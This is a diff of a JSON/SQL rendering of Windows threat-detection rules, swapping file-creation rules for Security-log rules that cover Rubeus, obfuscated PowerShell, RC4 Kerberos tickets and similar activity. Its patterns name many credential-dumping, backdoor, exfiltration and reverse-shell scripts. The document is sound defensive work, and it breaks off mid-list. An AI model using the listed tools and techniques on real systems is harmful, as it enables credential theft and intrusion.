"filename": "file_event_win_create_evtx_non_common_locations.yml" + "filename": "win_security_diagtrack_eop_default_login_username.yml" }, { - "title": "Inveigh Execution Artefacts", - "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "title": "Win Susp Computer Name Containing Samtheadmin", + "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "status": 
"experimental", - "description": "Detects the presence and execution of Inveigh via dropped artefacts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", + "author": "elhoim", "tags": [ - "attack.command_and_control", - "attack.t1219" + "cve.2021.42278", + "cve.2021.42287", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1078" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_hktl_inveigh_artefacts.yml" + "filename": "win_security_susp_computer_name.yml" }, { - "title": "Suspicious Double Extension Files", - "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "title": "Invoke-Obfuscation Via Use MSHTA - Security", + "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "status": "experimental", - "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", - 
"author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_double_extension.yml" + "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" }, { - "title": "Suspicious Creation TXT File in User Desktop", - "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "title": "Register new Logon Process by Rubeus", + "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", "status": "test", - "description": "Ransomware create txt file in the user Desktop", - "author": "frack113", + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.impact", - 
"attack.t1486" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" ], - "filename": "file_event_win_susp_desktop_txt.yml" + "filename": "win_security_register_new_logon_process_by_rubeus.yml" }, { - "title": "Startup Folder File Write", - "id": "2aa0a6b4-a865-495b-ab51-c28249537b75", - "status": "test", - "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", + "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "status": "experimental", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "FP could be caused by legitimate application writing shortcuts for example. 
This folder should always be inspected to make sure that all the files in there are legitimate" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp%' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" ], - "filename": "file_event_win_startup_folder_file_write.yml" + "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" }, { - "title": "CVE-2022-24527 Microsoft Connected Cache LPE", - "id": "e0a41412-c69a-446f-8e6e-0e6d7483dad7", + "title": "ISO Image Mount", + "id": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "status": "experimental", - "description": "Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the mount of ISO images on an endpoint", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.privilege_escalation", - "attack.t1059.001", - "cve.2022.24527" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Software installation ISO files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%WindowsPowerShell\\\\Modules\\\\webAdministration\\\\webAdministration.psm1' ESCAPE '\\' AND NOT ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND ObjectServer = 'Security' AND ObjectType = 'File' AND ObjectName LIKE 
'\\\\Device\\\\CdRom%' ESCAPE '\\') AND NOT (ObjectName LIKE '\\\\Device\\\\CdRom0\\\\setup.exe' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2022_24527_lpe.yml" + "filename": "win_security_iso_mount.yml" }, { - "title": "Creation Exe for Service with Unquoted Path", - "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\n", - "author": "frack113", + "title": "Invoke-Obfuscation Via Use Rundll32 - Security", + "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "file_event_win_creation_unquoted_service_path.yml" + "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" }, { - "title": "Adwind RAT / JRAT File Artifact", - "id": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "title": "Remote WMI 
ActiveScriptEventConsumers", + "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", "status": "test", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.003" + ], + "falsepositives": [ + "SCCM" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Oracle\\\\bin\\\\java%' ESCAPE '\\' AND TargetFilename LIKE '%.exe%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Retrive%' ESCAPE '\\' AND TargetFilename LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" ], - "filename": "file_event_win_mal_adwind.yml" + "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" }, { - "title": "QuarksPwDump Dump File", - "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", - "status": "test", - "description": "Detects a dump file written by QuarksPwDump password dumper", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", + "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + 
"attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" ], - "filename": "file_event_win_hktl_quarkspw_filedump.yml" + "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" }, { - "title": "APT29 2018 Phishing Campaign File Indicators", - "id": "3a3f81ca-652c-482b-adeb-b1c804727f74", - "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "@41thexplorer", + "title": "Suspicious Kerberos RC4 Ticket Encryption", + "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "status": "experimental", + "description": "Detects service ticket requests using RC4 encryption type", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Unlikely" + "Service accounts used on legacy systems (e.g. 
NetApp)", + "Windows Domains with DFL 2003 and legacy systems" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%ds7002.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.pdf%' ESCAPE '\\' OR TargetFilename LIKE '%ds7002.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" ], - "filename": "file_event_win_apt_cozy_bear_phishing_campaign_indicators.yml" + "filename": "win_security_susp_rc4_kerberos.yml" }, { - "title": "Malicious PowerShell Scripts - FileCreation", - "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", - "status": "test", - "description": "Detects the creation of known offensive powershell scripts used for exploitation", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", + "title": "Password Change on Directory Service Restore Mode (DSRM) Account", + "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "status": "stable", + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", + "author": "Thomas Patzke", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Initial installation of a domain controller" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' 